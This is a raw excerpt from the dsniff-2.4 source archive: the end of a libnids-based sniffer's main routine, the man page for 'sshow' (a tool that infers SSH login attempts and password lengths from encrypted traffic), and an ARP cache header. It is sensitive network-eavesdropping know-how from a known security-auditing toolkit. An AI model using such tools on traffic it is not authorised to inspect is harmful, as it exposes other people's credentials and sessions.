nids_params.syslog = null_syslog; nids_params.scan_num_hosts = 0; nids_params.one_loop_less = 1; if (!nids_init()) errx(1, "nids_init: %s", nids_errbuf); nids_register_tcp(process_event); if (nids_params.pcap_filter != NULL) { warnx("listening on %s [%s]", nids_params.device, nids_params.pcap_filter); } else warnx("listening on %s", nids_params.device); nids_run(); return (0); } dsniff-2.4/sshow.80000600000175000017500000000153407254574053013740 0ustar lucianoluciano.TH SSHOW 8 .ad .fi .SH NAME sshow \- SSH traffic analysis tool .SH SYNOPSIS .na .nf .fi \fBsshow\fR [\fB-d\fR] [\fB-i \fIinterface\fR] [\fIexpression\fR] .SH DESCRIPTION .ad .fi \fBsshow\fR analyzes encrypted SSH-1 and SSH-2 traffic, identifying authentication attempts, the lengths of passwords entered in interactive sessions, and command line lengths. .LP The following advisory describes the attacks implemented by \fBsshow\fR in detail: .LP .RS .I http://www.openwall.com/advisories/OW-003-ssh-traffic-analysis.txt .RE .SH OPTIONS .IP \fB-d\fR Enable verbose debugging output. .IP "\fB-i \fIinterface\fR" Specify the interface to listen on. .IP "\fIexpression\fR" Specify a tcpdump(8) filter expression to select traffic to sniff. .SH "SEE ALSO" dsniff(8), sshmitm(8) .SH AUTHORS .na .nf Solar Designer Dug Song dsniff-2.4/arp.h0000600000175000017500000000042107254076334013430 0ustar lucianoluciano/* * arp.h * * ARP cache routines. * * Copyright (c) 1999 Dug Song * * $Id: arp.h,v 1.1 2001/03/15 08:27:08 dugsong Exp $ */ #ifndef _ARP_H_ #define _ARP_H_ int arp_cache_lookup(in_addr_t ip, struct ether_addr *ether); #endif /* _ARP_H_ */